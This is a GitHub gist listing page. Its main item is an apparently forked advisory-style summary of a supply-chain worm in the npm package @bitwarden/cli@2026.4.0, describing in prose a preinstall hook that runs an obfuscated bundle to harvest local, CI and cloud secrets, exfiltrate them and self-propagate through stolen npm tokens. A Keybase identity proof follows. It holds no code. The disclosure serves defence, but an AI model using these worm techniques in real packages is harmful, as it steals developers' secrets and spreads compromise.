ZettaQuark gigabit

## 2026.4.0-bw1-public-gist.md

      
              3 files
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                gigabit
                / 2026.4.0-bw1-public-gist.md
            
            
              Created
              April 23, 2026 15:45
                — forked from N3mes1s/2026.4.0-bw1-public-gist.md
            
              
                @bitwarden/cli@2026.4.0 bw1.js supply-chain worm analysis
              
          
    @bitwarden/cli@2026.4.0 - bw1.js Supply-Chain Worm Analysis

Date: 2026-04-23
Analysis

The npm package @bitwarden/cli@2026.4.0 contains a malicious install-time payload. The package adds a preinstall hook that runs a Node bootstrapper, downloads Bun if needed, then executes a large obfuscated Bun bundle named bw1.js.
This is a full supply-chain worm and secret exfiltration agent. It harvests local secrets, CI secrets, GitHub repository secrets, and cloud secret stores, then exfiltrates encrypted results and uses stolen npm tokens to publish infected package updates.

  
## keybase.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                gigabit
                / keybase.md
            
            
              Created
              August 12, 2019 01:45
            
          
    Keybase proof

I hereby claim:

I am gigabit on github.
I am zettaquark (https://keybase.io/zettaquark) on keybase.
I have a public key ASAjy8ZpkmU-ppXPQCJWjE6LjPauhgK8Mw9yXHQQ3MnPmwo

To claim this, I am signing this object: